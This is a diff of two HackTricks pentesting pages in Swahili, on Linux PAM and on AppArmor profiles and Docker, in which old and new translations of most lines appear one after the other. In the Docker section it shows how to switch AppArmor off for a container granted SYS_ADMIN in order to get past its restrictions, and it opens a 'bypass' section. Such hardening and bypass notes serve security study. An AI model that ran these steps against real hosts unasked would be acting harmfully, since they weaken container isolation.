<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
**PAM (Moduli za Uthibitishaji Zinazoweza Kusanikishwa)** inafanya kazi kama kifaa cha usalama ambacho **inathibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta**, kudhibiti upatikanaji wao kulingana na vigezo mbalimbali. Ni kama mlinzi wa dijiti, ikihakikisha kuwa ni watumiaji walioruhusiwa tu ndio wanaweza kutumia huduma maalum wakati inawezekana kupunguza matumizi yao ili kuzuia mzigo wa mfumo.
**PAM (Moduli za Uthibitishaji Zinazoweza Kusanikishwa)** inafanya kama kifaa cha usalama ambacho **huthibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta**, kudhibiti upatikanaji wao kulingana na vigezo mbalimbali. Ni kama mlinzi wa kidijitali, kuhakikisha kuwa watumiaji walioruhusiwa pekee wanaweza kushirikiana na huduma maalum huku wakizuia matumizi yao kuzuia mzigo kwenye mfumo.
### Faili za Usanidi
- **Mifumo ya Solaris na UNIX** kwa kawaida hutumia faili ya usanidi ya kati iliyo katika eneo la `/etc/pam.conf`.
- **Mifumo ya Linux** inapendelea njia ya saraka, ikihifadhi usanidi maalum wa huduma ndani ya `/etc/pam.d`. Kwa mfano, faili ya usanidi kwa huduma ya kuingia inapatikana katika `/etc/pam.d/login`.
- **Mifumo ya Solaris na UNIX** kwa kawaida hutumia faili ya usanidi wa kati iliyoko kwenye `/etc/pam.conf`.
- **Mifumo ya Linux** hupendelea njia ya saraka, kuhifadhi usanidi wa huduma maalum ndani ya `/etc/pam.d`. Kwa mfano, faili ya usanidi kwa huduma ya kuingia inapatikana kwenye `/etc/pam.d/login`.
Mfano wa usanidi wa PAM kwa huduma ya kuingia unaweza kuonekana kama ifuatavyo:
Mfano wa usanidi wa PAM kwa huduma ya kuingia unaweza kuonekana kama hivi:
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -37,40 +50,53 @@ session required /lib/security/pam_unix_session.so
```
### **Maeneo ya Usimamizi wa PAM**
Maeneo haya, au vikundi vya usimamizi, vinajumuisha **uthibitisho**, **akaunti**, **nenosiri**, na **kikao**, kila moja ikihusika na vipengele tofauti vya mchakato wa uthibitisho na usimamizi wa kikao:
Maeneo haya, au vikundi vya usimamizi, vinajumuisha **uthibitisho**, **akaunti**, **nenosiri**, na **kikao**, kila moja ikihusika na sehemu tofauti za mchakato wa uthibitisho na usimamizi wa kikao:
- **Uthibitisho**: Inathibitisha kitambulisho cha mtumiaji, mara nyingi kwa kumuuliza nenosiri.
- **Uthibitisho**: Huthibitisha kitambulisho cha mtumiaji, mara nyingi kwa kumwomba nenosiri.
- **Akaunti**: Inashughulikia uthibitisho wa akaunti, ikichunguza hali kama uanachama wa kikundi au vizuizi vya wakati wa siku.
- **Nenosiri**: Inasimamia sasisho za nenosiri, ikiwa ni pamoja na ukaguzi wa utata au kuzuia mashambulizi ya kamusi.
- **Kikao**: Inasimamia hatua wakati wa kuanza au kumaliza kikao cha huduma, kama vile kufunga saraka au kuweka mipaka ya rasilimali.
- **Nenosiri**: Inasimamia sasisho za nenosiri, ikiwa ni pamoja na ukaguzi wa ugumu au kuzuia mashambulizi ya kamusi.
- **Kikao**: Inasimamia hatua wakati wa kuanza au kumaliza kikao cha huduma, kama vile kupakia saraka au kuweka mipaka ya rasilimali.
### **Mipangilio ya Moduli ya PAM**
Mipangilio inaamua jinsi moduli itakavyojibu mafanikio au kushindwa, ikichochea mchakato wa uthibitisho kwa ujumla. Hii ni pamoja na:
Mipangilio inadhibiti jibu la moduli kwa mafanikio au kushindwa, ikichochea mchakato mzima wa uthibitisho. Hizi ni pamoja na:
- **Inahitajika**: Kushindwa kwa moduli inayohitajika kunasababisha kushindwa kwa mwisho, lakini baada ya kuchunguzwa kwa moduli zote zinazofuata.
- **Inahitajika Mara moja**: Kukatishwa kwa mchakato mara moja baada ya kushindwa.
- **Inatosha**: Mafanikio yanapuuza ukaguzi wa sehemu iliyobaki ya eneo hilo isipokuwa moduli inayofuata inashindwa.
- **Hiari**: Inasababisha kushindwa tu ikiwa ni moduli pekee katika safu.
- **Inahitajika**: Kushindwa kwa moduli inayohitajika kunasababisha kushindwa hatimaye, lakini baada ya kuchunguzwa moduli zote zifuatazo.
- **Lazima**: Kukoma mara moja kwa mchakato baada ya kushindwa.
- **Inatosha**: Mafanikio yanapuuza sehemu iliyobaki ya uchunguzi wa eneo hilo isipokuwa moduli inayofuata inashindwa.
- **Hiari**: Inasababisha kushindwa tu ikiwa ni moduli pekee katika mstari.
### Mfano wa Skena
### **Mfano wa Tukio**
Katika mazingira yenye moduli nyingi za uthibitisho, mchakato unafuata mpangilio thabiti. Ikiwa moduli ya `pam_securetty` inagundua kuwa kituo cha kuingia hakiruhusiwi, kuingia kwa mtumiaji wa mizizi kunazuiliwa, lakini moduli zote bado zinashughulikiwa kutokana na hadhi yake ya "inahitajika". Moduli ya `pam_env` inaweka mazingira ya pembejeo, ikisaidia uzoefu wa mtumiaji. Moduli za `pam_ldap` na `pam_unix` zinafanya kazi pamoja kuthibitisha mtumiaji, na `pam_unix` inajaribu kutumia nenosiri lililotolewa hapo awali, ikiboresha ufanisi na uwezo katika njia za uthibitisho.
Katika mazingira yenye moduli nyingi za uthibitisho, mchakato unafuata mpangilio wa kina. Ikiwa moduli ya `pam_securetty` inagundua terminali ya kuingia isiyo ruhusa, kuingia kama mtumiaji wa mizizi kunazuiliwa, lakini moduli zote bado zinachakatwa kutokana na hadhi yake ya "inahitajika". Moduli ya `pam_env` inaweka mazingira ya mazingira, ikisaidia uzoefu wa mtumiaji. Moduli za `pam_ldap` na `pam_unix` zinafanya kazi pamoja kuthibitisha mtumiaji, na `pam_unix` ikijaribu kutumia nenosiri lililotolewa hapo awali, ikiboresha ufanisi na mabadiliko katika njia za uthibitisho.
## Marejeo
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,40 +2,54 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
AppArmor ni **uboreshaji wa kernel ulioundwa kuzuia rasilimali zinazopatikana kwa programu kupitia maelezo ya kila programu**, kwa ufanisi kutekeleza Udhibiti wa Upatikanaji wa Lazima (MAC) kwa kuunganisha sifa za udhibiti wa upatikanaji moja kwa moja kwa programu badala ya watumiaji. Mfumo huu hufanya kazi kwa **kupakia maelezo ya kila programu kwenye kernel**, kawaida wakati wa kuanza, na maelezo haya yanadhibiti ni rasilimali gani programu inaweza kupata, kama vile uhusiano wa mtandao, upatikanaji wa soketi za moja kwa moja, na ruhusa za faili.
AppArmor ni **uboreshaji wa kernel ulioundwa kuzuia rasilimali zilizopo kwa programu kupitia maelezo ya kila programu**, ikitekeleza Udhibiti wa Kufikia wa Lazima (MAC) kwa kufunga sifa za kudhibiti upatikanaji moja kwa moja kwa programu badala ya watumiaji. Mfumo huu hufanya kazi kwa **kupakia maelezo ya kila programu kwenye kernel**, kawaida wakati wa kuanza, na maelezo haya yanadhibiti ni rasilimali gani programu inaweza kupata, kama vile uhusiano wa mtandao, ufikiaji wa soketi za moja kwa moja, na ruhusa za faili.
Kuna njia mbili za uendeshaji kwa maelezo ya kila programu ya AppArmor:
Kuna njia mbili za uendeshaji kwa maelezo ya AppArmor:
- **Njia ya Utekelezaji**: Njia hii inatekeleza kikamilifu sera zilizoelezwa ndani ya maelezo ya kila programu, kwa kuzuia vitendo vinavyokiuka sera hizi na kurekodi jaribio lolote la kukiuka sera hizo kupitia mifumo kama syslog au auditd.
- **Njia ya Malalamiko**: Tofauti na njia ya utekelezaji, njia ya malalamiko haikatazi vitendo vinavyokwenda kinyume na sera za maelezo ya kila programu. Badala yake, inarekodi majaribio haya kama uvunjaji wa sera bila kutekeleza vizuizi.
- **Hali ya Utekelezaji**: Hali hii inatekeleza sera zilizoelezwa ndani ya maelezo, ikizuia vitendo vinavyokiuka sera hizi na kuingiza jaribio lolote la kukiuka kupitia mifumo kama syslog au auditd.
- **Hali ya Malalamiko**: Tofauti na hali ya utekelezaji, hali ya malalamiko haikazi vitendo vinavyokwenda kinyume na sera za maelezo. Badala yake, inaingiza jaribio hizi kama uvunjaji wa sera bila kutekeleza vizuizi.
### Vipengele vya AppArmor
- **Moduli ya Kernel**: Inahusika na utekelezaji wa sera.
- **Sera**: Zinaeleza sheria na vizuizi kwa tabia ya programu na upatikanaji wa rasilimali.
- **Kisomaji**: Inapakia sera kwenye kernel kwa utekelezaji au taarifa.
- **Zana**: Hizi ni programu za mode ya mtumiaji ambazo zinatoa kiolesura cha kuwasiliana na kusimamia AppArmor.
- **Moduli ya Kernel**: Inayowajibika kwa utekelezaji wa sera.
- **Sera**: Hufafanua sheria na vizuizi kwa tabia ya programu na ufikiaji wa rasilimali.
- **Mchambuzi**: Hupakia sera kwenye kernel kwa utekelezaji au kuripoti.
- **Zana**: Hizi ni programu za mode ya mtumiaji zinazotoa kiolesura cha kuingiliana na kusimamia AppArmor.
### Njia za Maelezo ya AppArmor
### Njia ya Maelezo
Maelezo ya AppArmor kawaida hufungwa katika _**/etc/apparmor.d/**_\
Kwa kutumia `sudo aa-status` utaweza kuorodhesha programu ambazo zimezuiliwa na maelezo ya kila programu. Ikiwa unaweza kubadilisha herufi "/" na kipindi cha njia ya kila programu iliyoorodheshwa, utapata jina la maelezo ya AppArmor ndani ya folda iliyotajwa.
Maelezo ya Apparmor kawaida hufutwa katika _**/etc/apparmor.d/**_\
Kwa `sudo aa-status` utaweza kuorodhesha programu zilizozuiwa na maelezo fulani. Ikiwa unaweza kubadilisha herufi "/" kwa kipindi cha njia ya kila programu iliyoorodheshwa utapata jina la maelezo ya apparmor ndani ya folda iliyotajwa.
Kwa mfano, maelezo ya **AppArmor** kwa _/usr/bin/man_ yatakuwa yamehifadhiwa katika _/etc/apparmor.d/usr.bin.man_
Kwa mfano, maelezo ya **apparmor** kwa _/usr/bin/man_ itapatikana katika _/etc/apparmor.d/usr.bin.man_
### Amri
```bash
@ -49,32 +63,32 @@ aa-mergeprof #used to merge the policies
```
## Kuunda wasifu
* Ili kuonyesha faili zilizoathiriwa, **njia kamili na alama za wilcard** zinaruhusiwa (kwa ajili ya kuchagua faili).
* Ili kuonyesha upatikanaji wa faili ambao programu itakuwa nayo, **udhibiti wa upatikanaji** ufuatao unaweza kutumika:
* Ili kuelezea programu inayohusika, **njia kamili na manyoya** huruhusiwa (kwa ajili ya kutambua faili) kwa kufafanua faili.
* Ili kuelezea ufikiaji ambao programu itakuwa nayo juu ya **faili** inaweza kutumika **udhibiti wa ufikiaji** zifuatazo:
* **r** (kusoma)
* **w** (kuandika)
* **m** (kumbukumbu ya ram kama inayoweza kutekelezwa)
* **m** (ramani ya kumbukumbu kama inayoweza kutekelezwa)
* **k** (kufunga faili)
* **l** (kuunda viungo vya ngumu)
* **ix** (kutekeleza programu nyingine na programu mpya inarithi sera)
* **ix** (kutekeleza programu nyingine na programu mpya kurithi sera)
* **Px** (kutekeleza chini ya wasifu mwingine, baada ya kusafisha mazingira)
* **Cx** (kutekeleza chini ya wasifu wa mtoto, baada ya kusafisha mazingira)
* **Ux** (kutekeleza bila kizuizi, baada ya kusafisha mazingira)
* **Mipangilio** inaweza kuwekwa katika wasifu na inaweza kubadilishwa kutoka nje ya wasifu. Kwa mfano: @{PROC} na @{HOME} (ongeza #include \<tunables/global> kwenye faili ya wasifu)
* **Sheria za kukataa zinasaidiwa ili kubadilisha sheria za kuruhusu**.
* **Viarasa** vinaweza kutajwa katika maelezo na vinaweza kubadilishwa kutoka nje ya wasifu. Kwa mfano: @{PROC} na @{HOME} (ongeza #include \<tunables/global> kwenye faili ya wasifu)
* **Mipangilio ya kukataa inasaidia kubadilisha viwango vya kuruhusu**.
### aa-genprof
Ili kuanza kwa urahisi kuunda wasifu, apparmor inaweza kukusaidia. Ni rahisi kufanya **apparmor ichunguze vitendo vilivyofanywa na programu na kisha kukuruhusu kuamua vitendo gani unataka kuruhusu au kukataa**.\
Ili kuanza kwa urahisi kuunda wasifu, apparmor inaweza kukusaidia. Ni rahisi kufanya **apparmor ichunguze vitendo vinavyofanywa na programu na kisha kuruhusu au kukataa vitendo**.\
Unahitaji tu kukimbia:
```bash
sudo aa-genprof /path/to/binary
```
Kisha, katika konsoli tofauti fanya vitendo vyote ambavyo kawaida programu itatekeleza:
Kisha, kwenye konsoli tofauti tekeleza hatua zote ambazo kawaida programu ya binary itatekeleza:
```bash
/path/to/binary -a dosomething
```
Kisha, katika konsoli ya kwanza bonyeza "**s**" na kisha katika hatua zilizorekodiwa eleza ikiwa unataka kuzipuuza, kuruhusu, au chochote. Ukimaliza bonyeza "**f**" na wasifu mpya utaundwa katika _/etc/apparmor.d/path.to.binary_
Kisha, katika console ya kwanza bonyeza "**s**" na kisha katika hatua zilizorekodiwa eleza ikiwa unataka kusahau, kuruhusu, au chochote. Ukimaliza bonyeza "**f**" na wasifu mpya utaundwa katika _/etc/apparmor.d/path.to.binary_
{% hint style="info" %}
Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/chochote
@ -82,7 +96,7 @@ Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/chochote
### aa-easyprof
Unaweza pia kuunda kigezo cha wasifu wa apparmor ya programu ya binary na:
Unaweza pia kuunda kiolezo cha wasifu wa apparmor wa binary na:
```bash
sudo aa-easyprof /path/to/binary
# vim:syntax=apparmor
@ -108,10 +122,10 @@ sudo aa-easyprof /path/to/binary
}
```
{% hint style="info" %}
Tafadhali kumbuka kuwa kwa chaguo-msingi katika wasifu uliozalishwa hakuna kitu kinachoruhusiwa, kwa hivyo kila kitu kimekataliwa. Utahitaji kuongeza mistari kama `/etc/passwd r,` ili kuruhusu kusoma faili ya binary `/etc/passwd` kwa mfano.
Tafadhali elewa kwamba kwa chaguo-msingi katika wasifu ulioundwa hakuna kitu kilichoruhusiwa, kwa hivyo kila kitu kimekataliwa. Utahitaji kuongeza mistari kama `/etc/passwd r,` kuruhusu kusoma faili ya binary `/etc/passwd` kwa mfano.
{% endhint %}
Kisha unaweza **kutekeleza** wasifu mpya na
Unaweza kisha **kutekeleza** wasifu mpya na
```bash
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
@ -122,10 +136,10 @@ Zana ifuatayo itasoma magogo na kuuliza mtumiaji ikiwa anataka kuruhusu baadhi y
sudo aa-logprof
```
{% hint style="info" %}
Kwa kutumia mishale ya kibonyezo unaweza kuchagua unachotaka kuruhusu/kukataa/chochote
Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/au chochote
{% endhint %}
### Kusimamia Profaili
### Kusimamia Wasifu
```bash
#Main profile management commands
apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode
@ -133,9 +147,9 @@ apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain
apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile
apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
## Kumbukumbu
## Ripoti
Mfano wa kumbukumbu za **AUDIT** na **DENIED** kutoka kwa faili _/var/log/audit/audit.log_ ya programu inayoweza kutekelezwa **`service_bin`**:
Mfano wa **AUDIT** na **DENIED** ripoti kutoka _/var/log/audit/audit.log_ ya programu inayoweza kutekelezwa **`service_bin`**:
```bash
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
@ -160,7 +174,7 @@ For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
## Apparmor katika Docker
Tazama jinsi wasifu **docker-profile** wa docker unavyopakiwa kwa chaguo-msingi:
Tafadhali kumbuka jinsi wasifu **docker-profile** wa docker unavyopakiwa kwa chaguo-msingi:
```bash
sudo aa-status
apparmor module is loaded.
@ -176,87 +190,85 @@ apparmor module is loaded.
/usr/lib/connman/scripts/dhclient-script
docker-default
```
Kwa chaguo-msingi, **Profaili ya Apparmor ya docker-default** inatengenezwa kutoka [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
Kwa chaguo-msingi **Profaili ya Apparmor ya docker-default** inatengenezwa kutoka [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
**Muhtasari wa profaili ya docker-default**:
**Muhtasari wa Profaili ya docker-default**:
* **Upatikanaji** wa mtandao wote
* **Uwezo wowote** haujatolewa (Hata hivyo, baadhi ya uwezo utatoka kwa kuingiza sheria za msingi za msingi kama vile #include \<abstractions/base>)
* **Kuandika** kwenye faili yoyote ya **/proc** **hairuhusiwi**
* **Subdirectories**/**faili** nyingine za /**proc** na /**sys** zinaruhusiwa kusoma/kuandika/kufunga/kuunganisha/kutekeleza
* **Kufunga** **hairuhusiwi**
* **Ptrace** inaweza kufanywa tu kwenye mchakato ambao umefungwa na **profaili sawa ya apparmor**
- **Upatikanaji** wa mtandao wote
- **Uwezo wowote** haujatambuliwa (Hata hivyo, baadhi ya uwezo utatoka kwa kuingiza sheria za msingi kama vile #include \<abstractions/base>)
- **Kuandika** kwenye faili yoyote ya **/proc** **hairuhusiwi**
- **Vidirisha vingine**/**faili** vya /**proc** na /**sys** **vinakatazwa** upatikanaji wa kusoma/kuandika/kufunga/kuunganisha/kutekeleza
- **Kufunga** **hairuhusiwi**
- **Ptrace** inaweza kufanywa kwenye mchakato ambao umefungwa na **profaili ile ile ya apparmor**
Maranyi unapo **kuanzisha chombo cha docker**, unapaswa kuona matokeo yafuatayo:
Maranyingi **unapoendesha chombo cha docker** unapaswa kuona matokeo yafuatayo:
```bash
1 processes are in enforce mode.
docker-default (825)
```
Tafadhali kumbuka kuwa **apparmor itazuia hata uwezo wa ruhusa** uliopewa kontena kwa chaguo-msingi. Kwa mfano, itaweza **kuzuia ruhusa ya kuandika ndani ya /proc hata kama uwezo wa SYS\_ADMIN umepewa** kwa sababu ya profaili ya apparmor ya docker kukataa ufikiaji huu kwa chaguo-msingi:
Tafadhali elewa kwamba **apparmor itazuia hata uwezo wa ruhusa** uliopewa kontena kwa chaguo-msingi. Kwa mfano, itaweza **kuzuia ruhusa ya kuandika ndani ya /proc hata kama uwezo wa SYS\_ADMIN umepewa** kwa sababu kwa chaguo-msingi, wasifu wa apparmor wa docker unakataa ufikiaji huu:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
echo "" > /proc/stat
sh: 1: cannot create /proc/stat: Permission denied
```
Unahitaji **kulemaza apparmor** ili kuepuka vizuizi vyake:
Unahitaji **kulemaza apparmor** ili kupita vizuizi vyake:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
Tafadhali kumbuka kwamba kwa chaguo-msingi **AppArmor** pia itakataza kontena kufunga folda kutoka ndani hata na uwezo wa SYS\_ADMIN.
Tafadhali kumbuka kwamba kwa chaguo-msingi **AppArmor** pia **itazuia kontena kufunga** folda kutoka ndani hata na uwezo wa SYS\_ADMIN.
Tafadhali kumbuka unaweza **kuongeza/kuondoa** uwezo kwa kontena ya docker (hii itakuwa bado imezuiliwa na njia za ulinzi kama **AppArmor** na **Seccomp**):
Tafadhali kumbuka unaweza **kuongeza/kuondoa** **uwezo** kwa kontena ya docker (hii bado itazuiliwa na njia za ulinzi kama **AppArmor** na **Seccomp**):
* `--cap-add=SYS_ADMIN` itaongeza uwezo wa `SYS_ADMIN`
* `--cap-add=ALL` itaongeza uwezo wote
* `--cap-drop=ALL --cap-add=SYS_PTRACE` itaondoa uwezo wote na kuongeza tu `SYS_PTRACE`
- `--cap-add=SYS_ADMIN` inapeana uwezo wa `SYS_ADMIN`
- `--cap-add=ALL` inapeana uwezo wote
- `--cap-drop=ALL --cap-add=SYS_PTRACE` inaondoa uwezo wote na inapeana tu `SYS_PTRACE`
{% hint style="info" %}
Kawaida, unapogundua kuwa una uwezo wa **kipekee** uliopo **ndani** ya kontena ya **docker** lakini sehemu fulani ya shambulio haifanyi kazi, hii itakuwa kwa sababu **apparmor ya docker itazuia**.
Kawaida, unapopata kwamba una **uwezo wa kipekee** uliopo **ndani** ya **kontena ya docker** lakini sehemu fulani ya **kudukua haifanyi kazi**, hii ni kwa sababu **apparmor ya docker itakuwa inazuia**.
{% endhint %}
### Mfano
(Mfano kutoka [**hapa**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/))
Ili kuelezea utendaji wa AppArmor, niliumba maelezo mapya ya Docker "mydocker" na mstari ufuatao uliongezwa:
Ili kufafanua utendaji wa AppArmor, niliunda wasifu mpya wa Docker "mydocker" na mstari ufuatao uliongezwa:
```
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
```
Kuamsha wasifu, tunahitaji kufanya yafuatayo:
Ili kuanzisha wasifu, tunahitaji kufanya yafuatayo:
```
sudo apparmor_parser -r -W mydocker
```
Kuorodhesha maelezo ya profaili, tunaweza kutumia amri ifuatayo. Amri hapa chini inaorodhesha maelezo ya profaili yangu mpya ya AppArmor.
Kutaja maelezo, tunaweza kutumia amri ifuatayo. Amri hapa chini inataja maelezo yangu ya AppArmor mpya.
```
$ sudo apparmor_status | grep mydocker
mydocker
```
Kama inavyoonekana hapa chini, tunapata kosa tunapojaribu kubadilisha "/etc/" kwani maelezo ya AppArmor yanazuia ufikiaji wa kuandika kwenye "/etc".
Kama inavyoonekana hapa chini, tunapata kosa tunapojaribu kubadilisha "/etc/" kwani wasifu wa AppArmor unazuia ufikiaji wa kuandika kwenye "/etc".
```
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
chmod: /etc/hostname: Permission denied
```
### AppArmor Docker Kupita1
### Kizuizi cha AppArmor cha Docker Bypass1
Unaweza kupata **profaili ya apparmor inayotumika kwenye kontena** kwa kutumia:
Unaweza kupata ni **wasifu wa apparmor unaoendesha kontena** kwa kutumia:
```bash
docker inspect 9d622d73a614 | grep lowpriv
"AppArmorProfile": "lowpriv",
